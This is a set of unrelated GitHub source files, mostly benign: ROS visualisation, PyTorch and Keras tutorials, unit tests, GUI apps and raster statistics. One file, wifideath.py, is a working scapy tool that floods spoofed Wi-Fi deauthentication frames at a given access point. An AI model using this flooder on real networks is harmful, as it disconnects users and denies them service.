lampole.pose.orientation.z = 0.0
lampole.pose.orientation.w = 1.0
#print("lampole")
#print(lampole)
self.mark_array.markers.append(lampole)
def __draw_light(self, color, on):
light = Marker()
light.header.frame_id = "/map"
light.header.stamp = rospy.Time.now()
print(f"{color} {on}")
# set shape, Arrow: 0; Cube: 1 ; Sphere: 2 ; Cylinder: 3
light.type = 2
light.id = light.color.r = self.lights_attr[color]["id"]
# Set the color
light.color.r = self.lights_attr[color]["on"][0] if on else self.lights_attr[color]["off"][0]
light.color.g = self.lights_attr[color]["on"][1] if on else self.lights_attr[color]["off"][1]
light.color.b = self.lights_attr[color]["on"][2] if on else self.lights_attr[color]["off"][2]
light.color.a = 1.0
# Set the scale of the marker
light.scale.x = 1.0
light.scale.y = 1.0
light.scale.z = 1.0
# Set the pose of the marker
light.pose.position.x = self.lights_attr[color]["pose"].x
light.pose.position.y = self.lights_attr[color]["pose"].y
light.pose.position.z = self.lights_attr[color]["pose"].z
light.pose.orientation.x = 0.0
light.pose.orientation.y = 0.0
light.pose.orientation.z = 0.0
light.pose.orientation.w = 1.0
#print("light" + color)
#print(light)
self.mark_array.markers.append(light)
def __draw_coutdown(self, sec):
countdowan_text = Marker()
countdowan_text.header.frame_id = "/map"
countdowan_text.header.stamp = rospy.Time.now()
# set shape, Arrow: 0; Cube: 1 ; Sphere: 2 ; Cylinder: 3
countdowan_text.type = 9
countdowan_text.id = 7
# Set the scale of the marker
countdowan_text.scale.z = 1.0
countdowan_text.text = str(sec)
# Set the color
countdowan_text.color.r = 1.0
countdowan_text.color.g = 1.0
countdowan_text.color.b = 1.0
countdowan_text.color.a = 1.0
# Set the pose of the marker
countdowan_text.pose.position.x = self.count_down.x
countdowan_text.pose.position.y = self.count_down.y
countdowan_text.pose.position.z = self.count_down.z
countdowan_text.pose.orientation.x = 0.0
countdowan_text.pose.orientation.y = 0.0
countdowan_text.pose.orientation.z = 0.0
countdowan_text.pose.orientation.w = 1.0
self.mark_array.markers.append(countdowan_text)
def __draw_arrow(self, direction, on):
direction_const = dict()
arrow = Marker()
arrow.header.frame_id = "/map"
arrow.header.stamp = rospy.Time.now()
# set shape, Arrow: 0; Cube: 1 ; Sphere: 2 ; Cylinder: 3
arrow.type = 0
arrow.id = self.lights_attr[direction]["id"]
# Set the scale of the marker
arrow.scale.x = 0.3
arrow.scale.y = 0.5
arrow.scale.z = 0.0
# Set the color
arrow.color.r = self.lights_attr[direction]["on"][0] if on else self.lights_attr[direction]["off"][0]
arrow.color.g = self.lights_attr[direction]["on"][1] if on else self.lights_attr[direction]["off"][1]
arrow.color.b = self.lights_attr[direction]["on"][2] if on else self.lights_attr[direction]["off"][2]
arrow.color.a = 1.0
head = None
tail = None
if direction == "g_l":
head = Point(self.lights_attr[direction]["pose"].x - 0.5 * self.light_radius * self.unit_vector[0],
self.lights_attr[direction]["pose"].y - 0.5 * self.light_radius * self.unit_vector[1],
self.lights_attr[direction]["pose"].z - 0.5 * self.light_radius * self.unit_vector[2])
tail = Point(self.lights_attr[direction]["pose"].x + 0.5 * self.light_radius * self.unit_vector[0],
self.lights_attr[direction]["pose"].y + 0.5 * self.light_radius * self.unit_vector[1],
self.lights_attr[direction]["pose"].z + 0.5 * self.light_radius * self.unit_vector[2])
elif direction == "g_r":
head = Point(self.lights_attr[direction]["pose"].x + 0.5 * self.light_radius * self.unit_vector[0],
self.lights_attr[direction]["pose"].y + 0.5 * self.light_radius * self.unit_vector[1],
self.lights_attr[direction]["pose"].z + 0.5 * self.light_radius * self.unit_vector[2])
tail = Point(self.lights_attr[direction]["pose"].x - 0.5 * self.light_radius * self.unit_vector[0],
self.lights_attr[direction]["pose"].y - 0.5 * self.light_radius * self.unit_vector[1],
self.lights_attr[direction]["pose"].z - 0.5 * self.light_radius * self.unit_vector[2])
elif direction == "g_s":
head = Point(self.lights_attr[direction]["pose"].x,
self.lights_attr[direction]["pose"].y,
self.lights_attr[direction]["pose"].z + 0.5)
tail = Point(self.lights_attr[direction]["pose"].x,
self.lights_attr[direction]["pose"].y,
self.lights_attr[direction]["pose"].z - 0.5)
arrow.points = [tail, head]
arrow.pose.orientation.x = 0.0
arrow.pose.orientation.y = 0.0
arrow.pose.orientation.z = 0.0
arrow.pose.orientation.w = 1.0
self.mark_array.markers.append(arrow)
def dump_marker_array(self, r=0, y=0, g=0, g_l=0, g_s=0, g_r=0, sec=99):
print("+++++++++++++++++++++++")
print(f"{r} {y} {g} ")
print(f"{bool(1)} {bool(0)} {bool(0)} ")
self.__draw_light_pole()
self.__draw_light("r", bool(int(r)))
self.__draw_light("y", bool(int(y)))
#self.__draw_light("g", bool(int(g)))
self.__draw_arrow("g_l", bool(int(g_l)))
self.__draw_arrow("g_s", bool(int(g_s)))
self.__draw_arrow("g_r", bool(int(g_r)))
self.__draw_coutdown(sec)
print(self.mark_array)
return self.mark_array
def turn_on(self, color):
pass
def turn_off(self, color):
pass
def flashing(self, color):
pass
if __name__ == '__main__':
rospy.init_node('rviz_marker')
stop_line = [1587.7426, 45506.1915, 66.5132, 1587.553, 45505.8394, 66.5042]
traffic_light = Traffic_Light_Marker_Array(stop_line)
print(f"{traffic_light.dump_marker_array()}")
marker_pub = rospy.Publisher("/my_marker", MarkerArray, queue_size = 2)
while not rospy.is_shutdown():
marker_pub.publish(traffic_light.dump_marker_array())
rospy.rostime.wallsleep(1.0)
| wasn-lab/Taillight_Recognition_with_VGG16-WaveNet | src/utilities/rviz_traffic_light/src/Traffic_light.py | Traffic_light.py | py | 12,637 | python | en | code | 2 | github-code | 13 |
29382549925 | #!/usr/bin/env python
import sys
import logging
import scapy.all as scapy
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
def broadcast_flood(interface, bssid):
packet = scapy.Dot11(
addr1='ff:ff:ff:ff:ff:ff',
addr2=bssid,
addr3=bssid
) / scapy.Dot11Deauth()
scapy.sendp(packet, iface=interface, loop=1, verbose=0)
def main():
if len(sys.argv) != 3:
print('%s <Interface> <BSSID>' % sys.argv[0])
sys.exit(1)
print('Flooding is started...')
broadcast_flood(sys.argv[1], sys.argv[2])
if __name__ == '__main__':
main()
| vodkabears/wifideath | wifideath.py | wifideath.py | py | 605 | python | en | code | 4 | github-code | 13 |
5264297756 | import torch
from torch import nn
import matplotlib.pyplot as plt
import requests
from pathlib import Path
from sklearn.datasets import make_circles
from sklearn.model_selection import train_test_split
import pandas as pd
# number of samples
n = 1000
#create circles
X, y = make_circles(n,
noise=0.01,
random_state=69)
print(f"X.shape: {X.shape}, y.shape: {y.shape}")
# print(f"first 5 samples: {X[:5], y[:5]}")
# make dataframe of circles
circles = pd.DataFrame({"X1": X[:,0],
"X2": X[:,1],
"label":y })
print(circles.head(10))
# print(circles.label.value_counts()) # How many values of each class is there?
# visualise the data
plt.scatter(x=X[:,0],
y=X[:,1],
c=y,
cmap=plt.cm.RdYlBu)
# plt.show()
# turning data into tensors
X = torch.from_numpy(X).type(torch.float) # and also changed the dtype
y = torch.from_numpy(y).type(torch.float)
# print(X[:10], y[:10])
# splitting the data into test and train sets
X_train, X_test, y_train, y_test = train_test_split(X,
y,
test_size=0.2,
random_state=69)
print(f"X_train.shape: {X_train.shape}, X_test.shape: {X_test.shape}, y_train.shape: {y_train.shape}, y_test.shape: {y_test.shape} ")
# make the code device agnostic
device = "cuda" if torch.cuda.is_available() else "cpu"
# print(f"Available device: {device}")
### Building the model
# Just with linear activations
class BinaryClassification_v01(nn.Module):
def __init__(self):
super().__init__()
self.layer1 = nn.Linear(in_features=2, out_features=10)
self.layer2 = nn.Linear(in_features=10, out_features=1)
def forward(self, x):
return self.layer2(self.layer1(x))
# # another way to create the model is
# model = nn.Sequential(
# nn.Linear(in_features=2, out_features=10),
# nn.Linear(in_features=10, out_features=1)
# ).to(device)
# with ReLU activations
class BinaryClassification_v02(nn.Module):
def __init__(self):
super().__init__()
self.layer1 = nn.Linear(in_features=2, out_features=10)
self.layer2 = nn.Linear(in_features=10, out_features=10)
self.layer3 = nn.Linear(in_features=10, out_features=1)
self.relu = nn.ReLU()
def forward(self, x):
return self.layer3(self.relu(self.layer2(self.relu(self.layer1(x))))) # 2 relu layers
# creating an instance of the model and sending to cuda as well
model_0 = BinaryClassification_v01().to(device) # with only linear
print(f"Model: {model_0}")
# lets pass the data through the model before it has been trained on anything
untrained_preds = model_0(X_test.to(device))
print(f"y_test[:10]: {y_test[:10]}")
print(f"untrained_pred[:10]: {untrained_preds[:10].squeeze()}")
# Accuracy method to determine accuracy of the model
def accuracy_fn(y_true, y_preds):
equalities = torch.eq(y_preds,y_true)
no_of_equalities = sum(equalities).item()
acc = (no_of_equalities / len(y_preds))*100
return acc
# lets setup the loss function and optimizer for training
loss_fn = nn.BCEWithLogitsLoss()
optimizer = torch.optim.SGD(model_0.parameters(),
lr=0.01)
# Train the model
torch.manual_seed(69)
torch.cuda.manual_seed(69)
# sending the data to the device (cuda)
X_train, y_train = X_train.to(device), y_train.to(device)
X_test, y_test = X_test.to(device), y_test.to(device)
epochs = 100
for epoch in range(epochs):
model_0.train() # setting the model to train mode
# 1. Forward pass
y_logits = model_0(X_train).squeeze()# the model returns the logits since loss function is BCE with logits
y_preds = torch.round(torch.sigmoid(y_logits)) # logits -> probabilties -> turning to 0 or 1
# 2. Calculating loss
loss = loss_fn(y_logits, y_train)
acc = accuracy_fn(y_train, y_preds)
# 3. Setting grad to zero
optimizer.zero_grad()
# 4. Backpropagation
loss.backward()
# 5. Optimizer step
optimizer.step()
## Testing
model_0.eval() # setting the model to evaluation mode
with torch.inference_mode():
# Forward pass
test_logits = model_0(X_test).squeeze()
test_preds = torch.round(torch.sigmoid(test_logits))
# Calculate loss and accuracy
test_loss = loss_fn(test_logits, y_test)
test_acc = accuracy_fn(y_true=y_test,
y_preds=test_preds)
# printing
if epoch % 10 ==0:
print(f"Epoch: {epoch} | loss: {loss:.5f} | Accuracy: {acc:.2f} | Test loss: {test_loss:.5f} | Test accuracy: {test_acc:.2f} ")
# BinaryClassification_v01 doesnt seem to do anything. The accuracy is 50%.
# Downloading helper functions to plot the decision boundary made by this model
if Path("helper_functions.py").is_file(): # if the file containing helper functions already exists
print("The file already exists")
else:
request = requests.get("https://raw.githubusercontent.com/mrdbourke/pytorch-deep-learning/main/helper_functions.py") # getting the file from this url
with open("helper_functions.py", "wb") as f: # creating a file with the name
f.write(request.content) # writing the contents of the request to the file
from helper_functions import plot_predictions, plot_decision_boundary
plt.figure(figsize=(12,6))
plt.subplot(1,2,1)
plt.title("Train")
plot_decision_boundary(model_0, X_train, y_train)
plt.subplot(1,2,2)
plt.title("Test")
plot_decision_boundary(model_0, X_test, y_test)
plt.show()
model_1 = BinaryClassification_v02().to(device)
print(f"Model: {model_1}")
loss_fn = nn.BCEWithLogitsLoss()
optimizer = torch.optim.Adam(model_1.parameters(), # Adam works wayyy better than just SGD
lr=0.1)
# Training the model
epochs = 1000
for epoch in range(epochs):
model_1.train()
y_logits = model_1(X_train).squeeze()
y_preds = torch.round(torch.sigmoid(y_logits))
loss = loss_fn(y_logits, y_train)
acc = accuracy_fn(y_true=y_train,
y_preds=y_preds)
optimizer.zero_grad()
loss.backward()
optimizer.step()
model_1.eval()
with torch.inference_mode():
test_logits = model_1(X_test).squeeze()
test_preds = torch.round(torch.sigmoid(test_logits))
test_loss = loss_fn(test_logits, y_test)
test_acc = accuracy_fn(y_true=y_test,
y_preds=test_preds)
if epoch % 100 ==0:
print(f"Epoch: {epoch} | loss: {loss:.5f} | accuracy: {acc:.2f} | Test loss: {test_loss:.5f} | Test accuracy: {test_acc:.2f}")
plt.figure(figsize=(12,6))
plt.subplot(1,2,1)
plt.title("Train")
plot_decision_boundary(model_1, X_train, y_train)
plt.subplot(1,2,2)
plt.title("Test")
plot_decision_boundary(model_1, X_test, y_test)
plt.show() | puklu/Deep-Learning-PyTorch- | Practice/01_Binary_Classification/main.py | main.py | py | 6,970 | python | en | code | 0 | github-code | 13 |
9844827255 | # -*- coding: utf-8 -*-
import pytest
from raiden.mtree import merkleroot, check_proof, get_proof, NoHash32Error
from raiden.utils import keccak
def test_empty():
assert merkleroot([]) == ''
assert merkleroot(['']) == ''
def test_multiple_empty():
assert merkleroot(['', '']) == ''
def test_non_hash():
with pytest.raises(NoHash32Error):
merkleroot(['not32bytes', 'neither'])
def test_single():
hash_0 = keccak('x')
assert merkleroot([hash_0]) == hash_0
def test_duplicates():
hash_0 = keccak('x')
hash_1 = keccak('y')
assert merkleroot([hash_0, hash_0]) == hash_0, 'duplicates should be removed'
result0 = merkleroot([hash_0, hash_1, hash_0])
result1 = merkleroot([hash_0, hash_1])
assert result0 == result1, 'duplicates should be removed'
def test_one():
hash_0 = 'a' * 32
merkle_tree = [hash_0]
merkle_proof = get_proof(merkle_tree, hash_0)
merkle_root = merkleroot(merkle_tree)
assert merkle_proof == []
assert merkle_root == hash_0
assert check_proof(merkle_proof, merkle_root, hash_0) is True
def test_two():
hash_0 = 'a' * 32
hash_1 = 'b' * 32
merkle_tree = [hash_0, hash_1]
merkle_proof = get_proof(merkle_tree, hash_0)
merkle_root = merkleroot(merkle_tree)
assert merkle_proof == [hash_1]
assert merkle_root == keccak(hash_0 + hash_1)
assert check_proof(merkle_proof, merkle_root, hash_0)
merkle_proof = get_proof(merkle_tree, hash_1)
merkle_root = merkleroot(merkle_tree)
assert merkle_proof == [hash_0]
assert merkle_root == keccak(hash_0 + hash_1)
assert check_proof(merkle_proof, merkle_root, hash_1)
def test_three():
def sort_join(first, second):
return ''.join(sorted([first, second]))
hash_0 = 'a' * 32
hash_1 = 'b' * 32
hash_2 = 'c' * 32
merkle_tree = [hash_0, hash_1, hash_2]
hash_01 = (
b'me\xef\x9c\xa9=5\x16\xa4\xd3\x8a\xb7\xd9\x89\xc2\xb5\x00'
b'\xe2\xfc\x89\xcc\xdc\xf8x\xf9\xc4m\xaa\xf6\xad\r['
)
assert keccak(hash_0 + hash_1) == hash_01
calculated_root = keccak(hash_2 + hash_01)
merkle_proof = get_proof(merkle_tree, hash_0)
merkle_root = merkleroot(merkle_tree)
assert merkle_proof == [hash_1, hash_2]
assert merkle_root == calculated_root
assert check_proof(merkle_proof, merkle_root, hash_0)
merkle_proof = get_proof(merkle_tree, hash_1)
merkle_root = merkleroot(merkle_tree)
assert merkle_proof == [hash_0, hash_2]
assert merkle_root == calculated_root
assert check_proof(merkle_proof, merkle_root, hash_1)
merkle_proof = get_proof(merkle_tree, hash_2)
merkle_root = merkleroot(merkle_tree)
# with an odd number of values, the last value wont appear by itself in the
# proof since it isn't hashed with another value
assert merkle_proof == [keccak(hash_0 + hash_1)]
assert merkle_root == calculated_root
assert check_proof(merkle_proof, merkle_root, hash_2)
def test_get_proof():
hash_0 = 'a' * 32
hash_1 = 'b' * 32
merkle_tree = [hash_0, hash_1]
merkle_proof = get_proof(merkle_tree, hash_0)
merkle_root = merkleroot(merkle_tree)
assert check_proof(merkle_proof, merkle_root, hash_0)
second_merkle_proof = get_proof(merkle_tree, hash_0, merkle_root)
assert check_proof(second_merkle_proof, merkle_root, hash_0)
assert merkle_proof == second_merkle_proof
def test_many(tree_up_to=10):
for number_of_leaves in range(tree_up_to):
merkle_tree = [
keccak(str(value))
for value in range(number_of_leaves)
]
for value in merkle_tree:
merkle_proof = get_proof(merkle_tree, value)
merkle_root = merkleroot(merkle_tree)
second_proof = get_proof(merkle_tree, value, merkle_root)
assert check_proof(merkle_proof, merkle_root, value) is True
assert check_proof(second_proof, merkle_root, value) is True
assert merkleroot(merkle_tree) == merkleroot(reversed(merkle_tree))
| utzig/raiden | raiden/tests/unit/test_mtree.py | test_mtree.py | py | 4,055 | python | en | code | null | github-code | 13 |
24415142310 | from unittest import TestCase
from walkoff.messaging import WorkflowAuthorization
class TestWorkflowAuthorization(TestCase):
def test_is_authorized(self):
users = [1, 2, 3]
roles = [3, 4]
auth = WorkflowAuthorization(users, roles)
for user in users:
self.assertTrue(auth.is_authorized(user, 3))
for role in roles:
self.assertTrue(auth.is_authorized(1, role))
self.assertFalse(auth.is_authorized(4, 5))
self.assertFalse(auth.is_authorized(10, 10))
def test_add_authorized_users(self):
users = [1, 2, 3]
roles = [3, 4]
auth = WorkflowAuthorization(users, roles)
users2 = [5, 6]
roles2 = [1, 2]
auth.add_authorizations(users2, roles2)
for user in users + users2:
self.assertTrue(auth.is_authorized(user, 3))
for role in roles + roles2:
self.assertTrue(auth.is_authorized(1, role))
def test_append_user(self):
users = [1, 2, 3]
roles = [3, 4]
auth = WorkflowAuthorization(users, roles)
auth.append_user(1)
self.assertEqual(auth.peek_user(), 1)
auth.append_user(5)
self.assertEqual(auth.peek_user(), 5)
def test_pop_user(self):
users = [1, 2, 3]
roles = [3, 4]
auth = WorkflowAuthorization(users, roles)
auth.append_user(1)
auth.append_user(5)
self.assertEqual(auth.pop_user(), 5)
self.assertEqual(auth.pop_user(), 1)
| xa7YvcR3/WALKOFF | tests/test_workflow_authorization.py | test_workflow_authorization.py | py | 1,515 | python | en | code | null | github-code | 13 |
29045224023 | import numpy as np
import os
from typing import List
import tensorflow.keras.models as models
from model import State
from agents import Agent
ThreeDimArr = List[List[List[int]]]
Board = List[List[int]]
# Agent that uses a neural network to (attempt to) compute the optimal move
class NeuralNetworkAgent(Agent):
def __init__(self, model_name: str = '1000_normalized.h5') -> None:
dir_path = os.path.dirname(os.path.realpath(__file__))
self.model = models.load_model(f'{dir_path}/models/{model_name}')
def evaluate(self, state: State) -> int:
board_3d = self.__reshape_board(state)
board_3d = np.expand_dims(board_3d, 0)
return self.model(board_3d)[0][0]
def __reshape_board(self, state: State) -> ThreeDimArr:
board = state.board
board_3d = np.zeros((4, State.SIZE, State.SIZE), dtype=np.int8)
# 3rd dimension - black, white, valid move, vulnerable disk
# black, white
for row_index, row in enumerate(board):
for col_index, cell in enumerate(row):
if cell == State.BLACK:
board_3d[0][row_index][col_index] = 1
elif cell == State.WHITE:
board_3d[1][row_index][col_index] = 1
# valid moves
valid_moves = state.valid_moves()
for row_index, col_index in valid_moves:
board_3d[2][row_index][col_index] = 1
# vulnerable disks
for row_index in range(State.SIZE):
for col_index in range(State.SIZE):
if state.is_disk_vulnerable((row_index, col_index)):
board_3d[3][row_index][col_index] = 1
return board_3d
def __str__(self) -> str:
return "Neural Network"
| chromium-52/reversi-ai | src/deepLearningAgents.py | deepLearningAgents.py | py | 1,761 | python | en | code | 0 | github-code | 13 |
3079789295 | # Import libraries
import re
import pandas as pd
from keras import Sequential
from keras.callbacks import TensorBoard
from keras.constraints import maxnorm
from keras.layers import Embedding, Conv1D, Dropout, MaxPooling1D, Flatten, Dense
from keras.optimizers import SGD
from keras.utils import to_categorical
from keras_preprocessing.sequence import pad_sequences
from keras_preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
import matplotlib.pyplot as plt
# Loading movie review sentiments data
testMovie_df = pd.read_csv('test.tsv', delimiter='\t', encoding='utf-8')
trainMovie_df = pd.read_csv('train.tsv', delimiter='\t', encoding='utf-8')
# Keeping only the necessary columns - cleaning the data set
trainMovie_df = trainMovie_df.drop(columns=['PhraseId', 'SentenceId'])
testMovie_df = testMovie_df.drop(columns=['PhraseId', 'SentenceId'])
trainMovie_df['Phrase'] = trainMovie_df['Phrase'].apply(lambda x: re.sub('[^a-zA-z0-9\s]', '', x.lower()))
testMovie_df['Phrase'] = testMovie_df['Phrase'].apply(lambda x: re.sub('[^a-zA-z0-9\s]', '', x.lower()))
max_features = 2000
tokenizer = Tokenizer(num_words=max_features, split=' ')
tokenizer.fit_on_texts(trainMovie_df['Phrase'].values)
X_train = tokenizer.texts_to_sequences(trainMovie_df['Phrase'].values)
X_train = pad_sequences(X_train)
tokenizer.fit_on_texts(testMovie_df['Phrase'].values)
X_test = tokenizer.texts_to_sequences(testMovie_df['Phrase'].values)
X_test = pad_sequences(X_train)
print("handing data")
# Creating the model
embed_dim = 256
lstm_out = 156
# Design the model using classification
# Model defined
model = Sequential()
# Input layer of the model for processing
model.add(Embedding(max_features, embed_dim, input_length=X_train.shape[1]))
# Convolutional layer
model.add(Conv1D(256, (5), activation='relu', padding='same', kernel_constraint=maxnorm(3)))
model.add(MaxPooling1D(5))
# Flatten layer
model.add(Flatten())
model.add(Dense(512, activation='relu', kernel_constraint=maxnorm(3)))
model.add(Dropout(0.5))
# Output layer
model.add(Dense(5, activation='softmax'))
# Compile the model identified
sgd = SGD(lr=0.01, momentum=0.9, decay=0.01 / 15, nesterov=False)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
# Identify the data into training and test sets
label_encoder = LabelEncoder()
integer_encoded = label_encoder.fit_transform(trainMovie_df['Sentiment'])
Y_train = to_categorical(integer_encoded)
x_train, x_test, y_train, y_test = train_test_split(X_train, Y_train, test_size=0.3, random_state=30)
# Fitting the model identified using the training data set
history = model.fit(x_train, y_train, epochs=2, batch_size=500, validation_data=(x_test, y_test))
# Evaluation of the results of the model obtained using the test data set
[test_loss, test_acc] = model.evaluate(x_test, y_test)
print("Evaluation result on Test Data : Loss = {}, accuracy = {}".format(test_loss, test_acc))
# Listing all the components of data present in history
print('The data components present in history are', history.history.keys())
# Graphical evaluation of accuracy associated with training and validation data
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('Evaluation of Data Accuracy')
plt.xlabel('epoch')
plt.ylabel('Accuracy of Data')
plt.legend(['TrainData', 'ValidationData'], loc='upper right')
plt.show()
# Graphical evaluation of loss associated with training and validation data
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.xlabel('epoch')
plt.ylabel('Loss of Data')
plt.title('Evaluation of Data Loss')
plt.legend(['TrainData', 'ValidationData'], loc='upper right')
plt.show()
# Visualization of the model using tensor board
tbCallBack = TensorBoard(log_dir='./lab2_1', histogram_freq=0, write_graph=True, write_images=True)
# Fitting the model defined using the training data along with validation using test data
history = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=2, verbose=0, initial_epoch=0)
# Evaluation of the loss and accuracy associated to the test data set
[test_loss, test_acc] = model.evaluate(x_test, y_test)
print("Evaluation result on Test Data using Tensorflow : Loss = {}, accuracy = {}".format(test_loss, test_acc))
# Listing all the components of data present in history
print('The data components present in history using Tensorflow are', history.history.keys())
# Graphical evaluation of accuracy associated with training and validation data
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('Evaluation of Data Accuracy using Tensorflow')
plt.xlabel('epoch')
plt.ylabel('Accuracy of Data')
plt.legend(['TrainData', 'ValidationData'], loc='upper right')
plt.show()
# Graphical evaluation of loss associated with training and validation data
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.xlabel('epoch')
plt.ylabel('Loss of Data')
plt.title('Evaluation of Data Loss using Tensorflow')
plt.legend(['TrainData', 'ValidationData'], loc='upper right')
plt.show() | adtmv7/CS5590-490-Python-Deep-Learning | LAB2/Source/4_text_cnn.py | 4_text_cnn.py | py | 5,299 | python | en | code | 2 | github-code | 13 |
21552877216 | '''
accountTab class UI tab Accounting
statisticTab class UI tab Statistics
settingTab class UI tab Settings
mainTab class UI tab with all tabs
'''
import PySimpleGUI as sg
from logic import *
class accountTab(takeData):
def __init__(self):
super().__init__()
def accountLayout(self):
#self.rerq = [123, 321, 999]
#self.rer = self.checkData(self.rerq)
self.Layout = [[
sg.Text('Amount:', size=(6, 1)),
sg.InputText(key='_AMOUNT_', size=(12, 1)),
sg.Radio('Profit', "group1", default=True, size=(4, 1), key='_Plus_'),
sg.Radio('Expenses', "group1", default=False, size=(8, 1), key='_Loss_'),
sg.Combo((self.takeCategory()), key='_CATEGORY_', size=(12, 1), readonly=True),
sg.Button('Added')],
[
sg.Listbox(values=(self.viewHistory()), size=(70, 14), key='_HISTORY_', background_color='Light Gray')]
]
return self.Layout
class statisticTab(statistic):
def __init__(self):
super().__init__()
def statisticLayout(self):
self.Layout = [[
sg.Multiline(self.takeMainStat(), size=(70, 13), key='_ALLSTAT_', background_color='Light Gray', disabled=True),],
[
sg.Text('Big +: use filter', key='_US1_', size=(21, 1)), sg.Text('Big -: use filter', key='_US2_', size=(21, 1)), sg.Text('BS: use filter', key='_US3_', size=(15, 1))
],
[
sg.Text('From:', size=(4, 1)), sg.InputText(default_text=datetime.date.today(), key='_DATE1_', size=(12, 1)), sg.Text('to:', size=(2, 1)), sg.InputText(default_text=datetime.date.today(), key='_DATE2_', size=(12, 1)), sg.Button('Filter'), sg.Button('Graph', key='_GRAPH_')
]
]
return self.Layout
class settingTab:
def __init__(self):
super().__init__()
def settingLayout(self):
self.Layout = [[
sg.Text('Monthly balance: {}, change: '.format(self.takeBalance()[0]), size=(26, 1), key='_STRBALANCE_'),
sg.InputText(key='_BALANCE_', size=(13, 1)),
sg.Button('Change')
]]
return self.Layout
class mainTab(accountTab, statisticTab, settingTab):
def __init__(self):
super().__init__()
self.window = self.mainLayout()
def mainLayout(self):
self.Layout = [
[
sg.TabGroup(
[[
sg.Tab('Accounting', self.accountLayout()), sg.Tab('Statistics', self.statisticLayout()), sg.Tab('Settings', self.settingLayout())
]])
]
]
return self.Layout
def updAccountTab(self):
return window.Element('_HISTORY_').Update(values=('123', '321')) | sikexe/expense-tracker-GUI | Lib/classes/widget.py | widget.py | py | 2,843 | python | en | code | 0 | github-code | 13 |
42323715010 | import pyqrcode
import PySimpleGUI as sg
import random
def Text():
layout2 = [ [sg.Text('Enter text in QR code')],
[sg.Input()],
[sg.OK()]]
window = sg.Window("text based qr").Layout(layout2)
while True:
event, values = window.read()
if event in (None, 'OK'): # if user closes window or clicks ok
qr = pyqrcode.create(values[0])
qr.png(f'{random.randint(100000,999999)} text.png', scale=8)
sg.popup(f'the qr code is created with file name:- {random.randint(100000,999999)} text.png')
break
def Info():
layout3 = [ [sg.Text('Enter the following info')],
[sg.Text('Name:- ')],[sg.Input()],
[sg.Text('Organisation:- ')], [sg.Input()],
[sg.Text('Email:- ')], [sg.Input()],
[sg.Text('Phone no. :- ')], [sg.Input()],
[sg.Text("Address:- ")], [sg.Input()],
[sg.Text('website URL:- ')], [sg.Input()],
[sg.OK()]]
window = sg.Window('Info QR').Layout(layout3)
while True:
event, values = window.read()
if event in (None, 'OK'): # if user closes window or clicks cancel
qr = pyqrcode.create(f'''name:- {values[0]}
Organistion:- {values[1]}
Email:- {values[2]}
Phone no.:- {values[3]}
Address:- {values[4]}
website:- {values[5]}''')
qr.png(f'{random.randint(100000,999999)} info.png', scale=8)
sg.popup(f'QR code created with file name :- {random.randint(100000,999999)} info.png')
break
def option_selection():
layout = [ [sg.Text("Select option")],
[sg.Radio('Text/Address/URL', "QR"), sg.Radio('Info', 'QR')],
[sg.OK()] ]
window = sg.Window("QR code Generator").Layout(layout)
# Event Loop to process "events" and get the "values" of the inputs
while True:
event, values = window.read()
if event in (None, 'OK'): # if user closes window or clicks cancel
break
if values[0] == True:
Text()
if values[0] == False:
Info()
option_selection() | akionsight/QR-Code-Creator | QR_Code_Generator.py | QR_Code_Generator.py | py | 2,372 | python | en | code | 1 | github-code | 13 |
1694431033 | # task 1: visualize a satellite image and shapefile using python
# task 2: descriptive analysis and acreage calculation
# import required libraries
from osgeo import gdal
from osgeo import ogr
import numpy as np
import math
from scipy.stats import mode
import os
import matplotlib.pyplot as plt
img = gdal.Open(r'C:\Users\student\1.tif')
band=img.GetRasterBand(1)
rast_array=band.ReadAsArray()
plt.imshow(rast_array)
rast_array = np.array(band.ReadAsArray())
rast_array .flatten()
min=np.min(rast_array)
max=np.max(rast_array)
meanval = np.mean(rast_array)
medianval = np.median(rast_array)
sdval = np.std(rast_array)
varianceval = np.var(rast_array)
rangeval = max - min
print("mean:",meanval)
print("medain:",medianval)
print("sdval:",sdval)
print("varia:",varianceval)
print("range:",rangeval)
plt.hist(rast_array)
| jaypadariya/jay_class | crop1 jay.py | crop1 jay.py | py | 886 | python | en | code | 0 | github-code | 13 |
9525042555 | from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QIntValidator
from PyQt5.QtWidgets import QWidget
class SliderWidget(QWidget):
def __init__(self, parent, title):
super(QWidget, self).__init__(parent)
self.slider = QWidget()
self.slider.layout = QtWidgets.QHBoxLayout()
self.value = 0
self.slider.sliderInput = QtWidgets.QSlider(Qt.Horizontal)
self.slider.sliderInput.setFocusPolicy(Qt.StrongFocus)
self.slider.sliderInput.setTickPosition(QtWidgets.QSlider.TicksBothSides)
self.slider.sliderInput.setTickInterval(10)
self.slider.sliderInput.setSingleStep(1)
self.slider.sliderInput.valueChanged.connect(self.changed_slider)
self.slider.sliderlabel = QtWidgets.QLabel("00")
self.slider.sliderlabel.setFont(QFont("Sanserif", 10))
self.slider.layout.addWidget(self.slider.sliderlabel)
self.slider.layout.addWidget(self.slider.sliderInput)
# Layout of title and slider + value
self.layout = QtWidgets.QVBoxLayout()
self.title = QtWidgets.QLabel(title)
self.title.setFont(QFont("Sanserif", 12))
self.layout.addWidget(self.title)
self.layout.addLayout(self.slider.layout)
def changed_slider(self):
self.value = self.slider.sliderInput.value()
if self.value >= 10:
self.slider.sliderlabel.setText(str(self.value))
else:
self.slider.sliderlabel.setText(f'0{str(self.value)}')
class intInputWidget(QWidget):
def __init__(self, parent, title):
super(QWidget, self).__init__(parent)
self.layout = QtWidgets.QHBoxLayout()
self.intLabel = QtWidgets.QLabel(title)
self.intLabel.setFont(QFont("Sanserif", 12))
self.intInput = QtWidgets.QLineEdit(self)
self.intInput.setFixedWidth(40)
self.intInput.setValidator(QIntValidator())
self.layout.addWidget(self.intLabel)
self.layout.addWidget(self.intInput)
self.layout.addStretch(1)
